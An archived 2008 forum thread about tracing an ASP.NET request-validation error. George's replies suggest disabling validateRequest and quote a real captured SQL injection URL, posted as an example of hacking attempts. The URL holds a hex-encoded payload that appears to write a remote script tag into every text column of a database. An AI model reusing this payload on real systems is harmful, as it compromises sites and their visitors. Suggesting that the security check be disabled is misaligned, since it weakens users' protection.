473,698 Members | 1,883 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

How to Know what Caused an Error

Greetings,

I have a Website that emails me any time an error occurs. I have debugging
on so that it can include page and line number information.

So I got a ton of the email below. Unfortunately, while I see it has
something to do with having "unsafe" characters in the query string, it
doesn't tell me on which page. Line 0 of App_Web_3uw3mai 2.5.cs means
absolutely nothing to me. And it's too big a site to try and guess.

Is there no way to figure out what caused this error?

Thanks.

Jonathan

<<<<<<<<<<

The following error has occurred on the server:

"Applicatio n Error Handler"

User: <email(ID: c8982fe1-0474-41b0-afea-a94f28ff5039)
Source: System.Web

System.Web.Http RequestValidati onException: A potentially dangerous
Request.QuerySt ring value was detected from the client (msg="...led using
<pages enableEventVa.. .").
at System.Web.Http Request.Validat eString(String s, String valueName,
String collectionName)
at System.Web.Http Request.Validat eNameValueColle ction(NameValue Collection
nvc, String collectionName)
at System.Web.Http Request.get_Que ryString()
at System.Web.UI.P age.GetCollecti onBasedOnMethod (Boolean dontReturnNull)
at System.Web.UI.P age.DeterminePo stBackMode()
at System.Web.UI.P age.ProcessRequ estMain(Boolean
includeStagesBe foreAsyncPoint, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est(Boolean
includeStagesBe foreAsyncPoint, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est()
at System.Web.UI.P age.ProcessRequ estWithNoAssert (HttpContext context)
at System.Web.UI.P age.ProcessRequ est(HttpContext context)
at ASP.errorreport _aspx.ProcessRe quest(HttpConte xt context) in
c:\WINDOWS\Micr osoft.NET\Frame work\v2.0.50727 \Temporary ASP.NET
Files\root\f2d4 905b\94fa3b3c\A pp_Web_3uw3mai2 .5.cs:line 0
at
System.Web.Http Application.Cal lHandlerExecuti onStep.System.W eb.HttpApplicat ion.IExecutionS tep.Execute()
at System.Web.Http Application.Exe cuteStep(IExecu tionStep step, Boolean&
completedSynchr onously)

Sep 28 '08 #1
6 2434
You obviously should include all related information like

Request.RawUrl, Request.Post.To String()...
into you report logging...

PS: That error happens usually when HTML tags are tried to be submitted
through the input box. By default ASP.NET prevents that.

You can set validateRequest ="false" in web.config to disable validation.
<pages validateRequest ="false">

George.
"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:%2******** ********@TK2MSF TNGP02.phx.gbl. ..
Greetings,

I have a Website that emails me any time an error occurs. I have debugging
on so that it can include page and line number information.

So I got a ton of the email below. Unfortunately, while I see it has
something to do with having "unsafe" characters in the query string, it
doesn't tell me on which page. Line 0 of App_Web_3uw3mai 2.5.cs means
absolutely nothing to me. And it's too big a site to try and guess.

Is there no way to figure out what caused this error?

Thanks.

Jonathan

<<<<<<<<<<

The following error has occurred on the server:

"Applicatio n Error Handler"

User: <email(ID: c8982fe1-0474-41b0-afea-a94f28ff5039)
Source: System.Web

System.Web.Http RequestValidati onException: A potentially dangerous
Request.QuerySt ring value was detected from the client (msg="...led using
<pages enableEventVa.. .").
at System.Web.Http Request.Validat eString(String s, String valueName,
String collectionName)
at
System.Web.Http Request.Validat eNameValueColle ction(NameValue Collection
nvc, String collectionName)
at System.Web.Http Request.get_Que ryString()
at System.Web.UI.P age.GetCollecti onBasedOnMethod (Boolean dontReturnNull)
at System.Web.UI.P age.DeterminePo stBackMode()
at System.Web.UI.P age.ProcessRequ estMain(Boolean
includeStagesBe foreAsyncPoint, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est(Boolean
includeStagesBe foreAsyncPoint, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est()
at System.Web.UI.P age.ProcessRequ estWithNoAssert (HttpContext context)
at System.Web.UI.P age.ProcessRequ est(HttpContext context)
at ASP.errorreport _aspx.ProcessRe quest(HttpConte xt context) in
c:\WINDOWS\Micr osoft.NET\Frame work\v2.0.50727 \Temporary ASP.NET
Files\root\f2d4 905b\94fa3b3c\A pp_Web_3uw3mai2 .5.cs:line 0
at
System.Web.Http Application.Cal lHandlerExecuti onStep.System.W eb.HttpApplicat ion.IExecutionS tep.Execute()
at System.Web.Http Application.Exe cuteStep(IExecu tionStep step, Boolean&
completedSynchr onously)
Sep 29 '08 #2
"George" <no*****@comcas t.netwrote in message
news:uh******** ******@TK2MSFTN GP05.phx.gbl...
You obviously should include all related information like

Request.RawUrl, Request.Post.To String()...
into you report logging...
I guess. Virtually all errors occur in my code so I can look at it. I guess
this is a rare exception.
PS: That error happens usually when HTML tags are tried to be submitted
through the input box. By default ASP.NET prevents that.

You can set validateRequest ="false" in web.config to disable validation.
<pages validateRequest ="false">
I'm not certain how comfortable I am with that, but that's good information
to know.

Thanks.

Jonathan
"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:%2******** ********@TK2MSF TNGP02.phx.gbl. ..
>Greetings,

I have a Website that emails me any time an error occurs. I have
debugging on so that it can include page and line number information.

So I got a ton of the email below. Unfortunately, while I see it has
something to do with having "unsafe" characters in the query string, it
doesn't tell me on which page. Line 0 of App_Web_3uw3mai 2.5.cs means
absolutely nothing to me. And it's too big a site to try and guess.

Is there no way to figure out what caused this error?

Thanks.

Jonathan

<<<<<<<<<<

The following error has occurred on the server:

"Applicatio n Error Handler"

User: <email(ID: c8982fe1-0474-41b0-afea-a94f28ff5039)
Source: System.Web

System.Web.Htt pRequestValidat ionException: A potentially dangerous
Request.QueryS tring value was detected from the client (msg="...led using
<pages enableEventVa.. .").
at System.Web.Http Request.Validat eString(String s, String valueName,
String collectionName)
at
System.Web.Htt pRequest.Valida teNameValueColl ection(NameValu eCollection
nvc, String collectionName)
at System.Web.Http Request.get_Que ryString()
at System.Web.UI.P age.GetCollecti onBasedOnMethod (Boolean
dontReturnNull )
at System.Web.UI.P age.DeterminePo stBackMode()
at System.Web.UI.P age.ProcessRequ estMain(Boolean
includeStagesB eforeAsyncPoint , Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est(Boolean
includeStagesB eforeAsyncPoint , Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est()
at System.Web.UI.P age.ProcessRequ estWithNoAssert (HttpContext context)
at System.Web.UI.P age.ProcessRequ est(HttpContext context)
at ASP.errorreport _aspx.ProcessRe quest(HttpConte xt context) in
c:\WINDOWS\Mic rosoft.NET\Fram ework\v2.0.5072 7\Temporary ASP.NET
Files\root\f2d 4905b\94fa3b3c\ App_Web_3uw3mai 2.5.cs:line 0
at
System.Web.Htt pApplication.Ca llHandlerExecut ionStep.System. Web.HttpApplica tion.IExecution Step.Execute()
at System.Web.Http Application.Exe cuteStep(IExecu tionStep step, Boolean&
completedSynch ronously)
Sep 29 '08 #3
I didn't see a Request.Post property. Did you mean something else?

Thanks.

Jonathan

"George" <no*****@comcas t.netwrote in message
news:uh******** ******@TK2MSFTN GP05.phx.gbl...
You obviously should include all related information like

Request.RawUrl, Request.Post.To String()...
into you report logging...

PS: That error happens usually when HTML tags are tried to be submitted
through the input box. By default ASP.NET prevents that.

You can set validateRequest ="false" in web.config to disable validation.
<pages validateRequest ="false">

George.
"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:%2******** ********@TK2MSF TNGP02.phx.gbl. ..
>Greetings,

I have a Website that emails me any time an error occurs. I have
debugging on so that it can include page and line number information.

So I got a ton of the email below. Unfortunately, while I see it has
something to do with having "unsafe" characters in the query string, it
doesn't tell me on which page. Line 0 of App_Web_3uw3mai 2.5.cs means
absolutely nothing to me. And it's too big a site to try and guess.

Is there no way to figure out what caused this error?

Thanks.

Jonathan

<<<<<<<<<<

The following error has occurred on the server:

"Applicatio n Error Handler"

User: <email(ID: c8982fe1-0474-41b0-afea-a94f28ff5039)
Source: System.Web

System.Web.Htt pRequestValidat ionException: A potentially dangerous
Request.QueryS tring value was detected from the client (msg="...led using
<pages enableEventVa.. .").
at System.Web.Http Request.Validat eString(String s, String valueName,
String collectionName)
at
System.Web.Htt pRequest.Valida teNameValueColl ection(NameValu eCollection
nvc, String collectionName)
at System.Web.Http Request.get_Que ryString()
at System.Web.UI.P age.GetCollecti onBasedOnMethod (Boolean
dontReturnNull )
at System.Web.UI.P age.DeterminePo stBackMode()
at System.Web.UI.P age.ProcessRequ estMain(Boolean
includeStagesB eforeAsyncPoint , Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est(Boolean
includeStagesB eforeAsyncPoint , Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est()
at System.Web.UI.P age.ProcessRequ estWithNoAssert (HttpContext context)
at System.Web.UI.P age.ProcessRequ est(HttpContext context)
at ASP.errorreport _aspx.ProcessRe quest(HttpConte xt context) in
c:\WINDOWS\Mic rosoft.NET\Fram ework\v2.0.5072 7\Temporary ASP.NET
Files\root\f2d 4905b\94fa3b3c\ App_Web_3uw3mai 2.5.cs:line 0
at
System.Web.Htt pApplication.Ca llHandlerExecut ionStep.System. Web.HttpApplica tion.IExecution Step.Execute()
at System.Web.Http Application.Exe cuteStep(IExecu tionStep step, Boolean&
completedSynch ronously)
Sep 29 '08 #4
Sorry, I meant Request.Form

George.

"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:eF******** *****@TK2MSFTNG P03.phx.gbl...
>I didn't see a Request.Post property. Did you mean something else?

Thanks.

Jonathan

"George" <no*****@comcas t.netwrote in message
news:uh******** ******@TK2MSFTN GP05.phx.gbl...
>You obviously should include all related information like

Request.RawUrl , Request.Post.To String()...
into you report logging...

PS: That error happens usually when HTML tags are tried to be submitted
through the input box. By default ASP.NET prevents that.

You can set validateRequest ="false" in web.config to disable validation.
<pages validateRequest ="false">

George.
"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:%2******* *********@TK2MS FTNGP02.phx.gbl ...
>>Greetings,

I have a Website that emails me any time an error occurs. I have
debugging on so that it can include page and line number information.

So I got a ton of the email below. Unfortunately, while I see it has
something to do with having "unsafe" characters in the query string, it
doesn't tell me on which page. Line 0 of App_Web_3uw3mai 2.5.cs means
absolutely nothing to me. And it's too big a site to try and guess.

Is there no way to figure out what caused this error?

Thanks.

Jonathan

<<<<<<<<<<

The following error has occurred on the server:

"Applicatio n Error Handler"

User: <email(ID: c8982fe1-0474-41b0-afea-a94f28ff5039)
Source: System.Web

System.Web.Ht tpRequestValida tionException: A potentially dangerous
Request.Query String value was detected from the client (msg="...led
using <pages enableEventVa.. .").
at System.Web.Http Request.Validat eString(String s, String valueName,
String collectionName)
at
System.Web.Ht tpRequest.Valid ateNameValueCol lection(NameVal ueCollection
nvc, String collectionName)
at System.Web.Http Request.get_Que ryString()
at System.Web.UI.P age.GetCollecti onBasedOnMethod (Boolean
dontReturnNul l)
at System.Web.UI.P age.DeterminePo stBackMode()
at System.Web.UI.P age.ProcessRequ estMain(Boolean
includeStages BeforeAsyncPoin t, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est(Boolean
includeStages BeforeAsyncPoin t, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est()
at System.Web.UI.P age.ProcessRequ estWithNoAssert (HttpContext context)
at System.Web.UI.P age.ProcessRequ est(HttpContext context)
at ASP.errorreport _aspx.ProcessRe quest(HttpConte xt context) in
c:\WINDOWS\Mi crosoft.NET\Fra mework\v2.0.507 27\Temporary ASP.NET
Files\root\f2 d4905b\94fa3b3c \App_Web_3uw3ma i2.5.cs:line 0
at
System.Web.Ht tpApplication.C allHandlerExecu tionStep.System .Web.HttpApplic ation.IExecutio nStep.Execute()
at System.Web.Http Application.Exe cuteStep(IExecu tionStep step,
Boolean& completedSynchr onously)
Sep 29 '08 #5
Yea, but usually you have tested the code. So it's not easy to guess were
problem is unless you can replicate the problem or simply ignore the error
message.
There are a lot of (spamming) robots that trying to submit the form with bad
information.
Or hacking attempts looking like this (taken from real site)
Path =
/article.aspx?ri d=23374';DECLAR E%20@S%20CHAR(4 000);SET%20@S=C AST(0x4445434C4 152452040542076 617263686172283 23535292C404320 766172636861722 834303030292044 45434C415245205 461626C655F4375 72736F722043555 2534F5220464F52 2073656C6563742 0612E6E616D652C 622E6E616D65206 6726F6D20737973 6F626A656374732 0612C737973636F 6C756D6E7320622 077686572652061 2E69643D622E696 420616E6420612E 78747970653D277 52720616E642028 622E78747970653 D3939206F722062 2E78747970653D3 335206F7220622E 78747970653D323 331206F7220622E 78747970653D313 63729204F50454E 205461626C655F4 37572736F722046 45544348204E455 8542046524F4D20 205461626C655F4 37572736F722049 4E544F2040542C4 043205748494C45 284040464554434 85F535441545553 3D3029204245474 94E206578656328 277570646174652 05B272B40542B27 5D20736574205B2 72B40432B275D3D 2727223E3C2F746 9746C653E3C7363 726970742073726 33D22687474703A 2F2F777777332E7 3733131716E2E63 6E2F63737273732 F772E6A73223E3C 2F7363726970743 E3C212D2D27272B 5B272B40432B275 D20776865726520 272B40432B27206 E6F74206C696B65 20272725223E3C2 F7469746C653E3C 736372697074207 372633D22687474 703A2F2F7777773 32E73733131716E 2E636E2F6373727 3732F772E6A7322 3E3C2F736372697 0743E3C212D2D27 272729464554434 8204E4558542046 524F4D202054616 26C655F43757273 6F7220494E544F2 040542C40432045 4E4420434C4F534 5205461626C655F 437572736F72204 445414C4C4F4341 5445205461626C6 55F437572736F72 %20AS%20CHAR(40 00));EXEC(@S);

The rid is suppose to be Int32 but someone trying to do SQL injection

George.
"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:e8******** ******@TK2MSFTN GP03.phx.gbl...
"George" <no*****@comcas t.netwrote in message
news:uh******** ******@TK2MSFTN GP05.phx.gbl...
>You obviously should include all related information like

Request.RawUrl , Request.Post.To String()...
into you report logging...

I guess. Virtually all errors occur in my code so I can look at it. I
guess this is a rare exception.
>PS: That error happens usually when HTML tags are tried to be submitted
through the input box. By default ASP.NET prevents that.

You can set validateRequest ="false" in web.config to disable validation.
<pages validateRequest ="false">

I'm not certain how comfortable I am with that, but that's good
information to know.

Thanks.

Jonathan
>"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:%2******* *********@TK2MS FTNGP02.phx.gbl ...
>>Greetings,

I have a Website that emails me any time an error occurs. I have
debugging on so that it can include page and line number information.

So I got a ton of the email below. Unfortunately, while I see it has
something to do with having "unsafe" characters in the query string, it
doesn't tell me on which page. Line 0 of App_Web_3uw3mai 2.5.cs means
absolutely nothing to me. And it's too big a site to try and guess.

Is there no way to figure out what caused this error?

Thanks.

Jonathan

<<<<<<<<<<

The following error has occurred on the server:

"Applicatio n Error Handler"

User: <email(ID: c8982fe1-0474-41b0-afea-a94f28ff5039)
Source: System.Web

System.Web.Ht tpRequestValida tionException: A potentially dangerous
Request.Query String value was detected from the client (msg="...led
using <pages enableEventVa.. .").
at System.Web.Http Request.Validat eString(String s, String valueName,
String collectionName)
at
System.Web.Ht tpRequest.Valid ateNameValueCol lection(NameVal ueCollection
nvc, String collectionName)
at System.Web.Http Request.get_Que ryString()
at System.Web.UI.P age.GetCollecti onBasedOnMethod (Boolean
dontReturnNul l)
at System.Web.UI.P age.DeterminePo stBackMode()
at System.Web.UI.P age.ProcessRequ estMain(Boolean
includeStages BeforeAsyncPoin t, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est(Boolean
includeStages BeforeAsyncPoin t, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est()
at System.Web.UI.P age.ProcessRequ estWithNoAssert (HttpContext context)
at System.Web.UI.P age.ProcessRequ est(HttpContext context)
at ASP.errorreport _aspx.ProcessRe quest(HttpConte xt context) in
c:\WINDOWS\Mi crosoft.NET\Fra mework\v2.0.507 27\Temporary ASP.NET
Files\root\f2 d4905b\94fa3b3c \App_Web_3uw3ma i2.5.cs:line 0
at
System.Web.Ht tpApplication.C allHandlerExecu tionStep.System .Web.HttpApplic ation.IExecutio nStep.Execute()
at System.Web.Http Application.Exe cuteStep(IExecu tionStep step,
Boolean& completedSynchr onously)
Sep 29 '08 #6
Yeah, most of the users I'm dealing with are not technical, and my site's
available only to paying customers. So, as far as I know, I'm just dealing
with things like the user hitting the back button and so a page is loaded in
the incorrect context, or in this case putting invalid characters in an
input string.

But I'm updating my reporting routines as suggested.

Thanks.

BTW, the hacking attempt you posted shouldn't cause any problems as long as
the page uses parameterized arguments, right.

Jonathan

"George" <no*****@comcas t.netwrote in message
news:O2******** *****@TK2MSFTNG P06.phx.gbl...
Yea, but usually you have tested the code. So it's not easy to guess were
problem is unless you can replicate the problem or simply ignore the error
message.
There are a lot of (spamming) robots that trying to submit the form with
bad information.
Or hacking attempts looking like this (taken from real site)
Path =
/article.aspx?ri d=23374';DECLAR E%20@S%20CHAR(4 000);SET%20@S=C AST(0x4445434C4 152452040542076 617263686172283 23535292C404320 766172636861722 834303030292044 45434C415245205 461626C655F4375 72736F722043555 2534F5220464F52 2073656C6563742 0612E6E616D652C 622E6E616D65206 6726F6D20737973 6F626A656374732 0612C737973636F 6C756D6E7320622 077686572652061 2E69643D622E696 420616E6420612E 78747970653D277 52720616E642028 622E78747970653 D3939206F722062 2E78747970653D3 335206F7220622E 78747970653D323 331206F7220622E 78747970653D313 63729204F50454E 205461626C655F4 37572736F722046 45544348204E455 8542046524F4D20 205461626C655F4 37572736F722049 4E544F2040542C4 043205748494C45 284040464554434 85F535441545553 3D3029204245474 94E206578656328 277570646174652 05B272B40542B27 5D20736574205B2 72B40432B275D3D 2727223E3C2F746 9746C653E3C7363 726970742073726 33D22687474703A 2F2F777777332E7 3733131716E2E63 6E2F63737273732 F772E6A73223E3C 2F7363726970743 E3C212D2D27272B 5B272B40432B275 D20776865726520 272B40432B27206 E6F74206C696B65 20272725223E3C2 F7469746C653E3C 736372697074207 372633D22687474 703A2F2F7777773 32E73733131716E 2E636E2F6373727 3732F772E6A7322 3E3C2F736372697 0743E3C212D2D27 272729464554434 8204E4558542046 524F4D202054616 26C655F43757273 6F7220494E544F2 040542C40432045 4E4420434C4F534 5205461626C655F 437572736F72204 445414C4C4F4341 5445205461626C6 55F437572736F72 %20AS%20CHAR(40 00));EXEC(@S);

The rid is suppose to be Int32 but someone trying to do SQL injection

George.
"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:e8******** ******@TK2MSFTN GP03.phx.gbl...
>"George" <no*****@comcas t.netwrote in message
news:uh******* *******@TK2MSFT NGP05.phx.gbl.. .
>>You obviously should include all related information like

Request.RawUr l, Request.Post.To String()...
into you report logging...

I guess. Virtually all errors occur in my code so I can look at it. I
guess this is a rare exception.
>>PS: That error happens usually when HTML tags are tried to be submitted
through the input box. By default ASP.NET prevents that.

You can set validateRequest ="false" in web.config to disable
validation.
<pages validateRequest ="false">

I'm not certain how comfortable I am with that, but that's good
information to know.

Thanks.

Jonathan
>>"Jonathan Wood" <jw***@softcirc uits.comwrote in message
news:%2****** **********@TK2M SFTNGP02.phx.gb l...
Greetings,

I have a Website that emails me any time an error occurs. I have
debugging on so that it can include page and line number information.

So I got a ton of the email below. Unfortunately, while I see it has
something to do with having "unsafe" characters in the query string, it
doesn't tell me on which page. Line 0 of App_Web_3uw3mai 2.5.cs means
absolutely nothing to me. And it's too big a site to try and guess.

Is there no way to figure out what caused this error?

Thanks.

Jonathan

<<<<<<<<<<

The following error has occurred on the server:

"Applicati on Error Handler"

User: <email(ID: c8982fe1-0474-41b0-afea-a94f28ff5039)
Source: System.Web

System.Web.H ttpRequestValid ationException: A potentially dangerous
Request.Quer yString value was detected from the client (msg="...led
using <pages enableEventVa.. .").
at System.Web.Http Request.Validat eString(String s, String valueName,
String collectionName)
at
System.Web.H ttpRequest.Vali dateNameValueCo llection(NameVa lueCollection
nvc, String collectionName)
at System.Web.Http Request.get_Que ryString()
at System.Web.UI.P age.GetCollecti onBasedOnMethod (Boolean
dontReturnNu ll)
at System.Web.UI.P age.DeterminePo stBackMode()
at System.Web.UI.P age.ProcessRequ estMain(Boolean
includeStage sBeforeAsyncPoi nt, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est(Boolean
includeStage sBeforeAsyncPoi nt, Boolean includeStagesAf terAsyncPoint)
at System.Web.UI.P age.ProcessRequ est()
at System.Web.UI.P age.ProcessRequ estWithNoAssert (HttpContext context)
at System.Web.UI.P age.ProcessRequ est(HttpContext context)
at ASP.errorreport _aspx.ProcessRe quest(HttpConte xt context) in
c:\WINDOWS\M icrosoft.NET\Fr amework\v2.0.50 727\Temporary ASP.NET
Files\root\f 2d4905b\94fa3b3 c\App_Web_3uw3m ai2.5.cs:line 0
at
System.Web.H ttpApplication. CallHandlerExec utionStep.Syste m.Web.HttpAppli cation.IExecuti onStep.Execute( )
at System.Web.Http Application.Exe cuteStep(IExecu tionStep step,
Boolean& completedSynchr onously)

Sep 29 '08 #7

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

7
1947
by: cppaddict | last post by:
Hi, I've been trying to debug a strange runtime error for the last 5 hours... I'm hoping someone might have an insight about it. I have an application that creates a vector of MyDisplay objects (MyDisplay is a custom class) and then uses them in various ways. The application has been compiling and running fine. Then I added a member variable of type enum to MyDisplay. So my class def now looks like this:
0
5000
by: Theodore | last post by:
Hello to everybody i am new to this forum and i have an important problem with sql statements in my website. why do i get these error messages , can anybody tell me; --> com.mysql.jdbc.PreparedStatement@1f11507: select news_id,DATE_FORMAT(news_date ,'%d %m %y')as Hmerominia , news_title, news_decr from news sql error:java.sql.SQLException: Communication link failure: java.net.SocketException, underlying cause: Software caused connection...
6
1447
by: Chris Lewis | last post by:
Hi, We have just experienced a very frustrating and time-consuming problem after applying Windows 2K updates to our webservers over the weekend, and I though I'd share this in case anyone else has the same problem and can learn from this. Our webservers are running .NET 1.0 and 1.1 side by side, though we are no longer using 1.0 at all. Our web application also runs .NET remoting to talk to middle tier components on other boxes. The...
0
3355
by: amitpatil | last post by:
I am having trouble with following error. there are few registration page when i register 2 members it works but when i try to create 3rd one i get following error and then for 10 mins or so website doesn't work. After 10 mins or so everything works till i do 3rd member's registration and again that error comes. Error Type: Active Server Pages error 'ASP 0115' Unexpected error
0
3379
by: koolestj | last post by:
I am trying to understand why a server restart would cause mod_jk to not find a worker. I checked all tomcat workers were running and I was able to telnet to the ajp port on each app server. Just to give background I have 1 web server that is running apache with mod_jk for load balancing. The apache web server is configured to run as a Service and is setup to run Automatically. I have 5 tomcat workers (app engines) that serve http requests...
2
1975
by: =?Utf-8?B?Qi4gQ2hlcm5pY2s=?= | last post by:
I've been looking at references about this all afternoon but I can't really see anything that seems relevant to my particular situation. I have a gridview. This is used in read-only mode only, strictly for display and deletes. Paging is on. I turned a column into a template and put a dropdown list in the header template. The values of this dropdown are read from a list of fixed values stored in a table other than the one bound to the...
0
5890
by: kuguy | last post by:
Hi all, I'm new to the forums, so I hope this isn't in the wrong place... I have that "Software caused connection abort: socket write error" exception error that i've never meet before. Basically what im trying to do is the following: - a client connect to a server using sslsocket. - server receive the connection and reply with the first part of the data and keep the connection open. - then client receive the reply and request for...
0
4619
by: mina | last post by:
My application which is written in vb.net 2005 uses sql server 2005 express as a database, this application is multi-user. So i am used 3 xp machine to install my application i can say machine1,machine2 ,machine3 on which i have install my application. On machine1 i also install SQL Server 2005 express. Then run mu application from machine1 which is locally its work fine. But i am facing problem when i am trying to connect from the...
2
3419
by: Edward | last post by:
I have a need to detect if an error is caused by HTTP error 404 in Application_Error (in global.asax). I read MSDN docs but did not get an answer. Is there a reliable workaround to detect this status?
0
8673
marktang
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look ! Part I. Meaning of...
0
9156
Oralloy
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...
1
8892
by: Hystou | last post by:
Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
0
8860
tracyyun
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
1
6518
isladogs
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules. He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms. Adolph will...
0
4365
by: TSSRALBI | last post by:
Hello I'm a network technician in training and I need your help. I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs. The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols. I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
1
3043
by: 6302768590 | last post by:
Hai team i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
2
2327
muto222
by: muto222 | last post by:
How can i add a mobile payment intergratation into php mysql website.
3
1998
bsmnconsultancy
by: bsmnconsultancy | last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.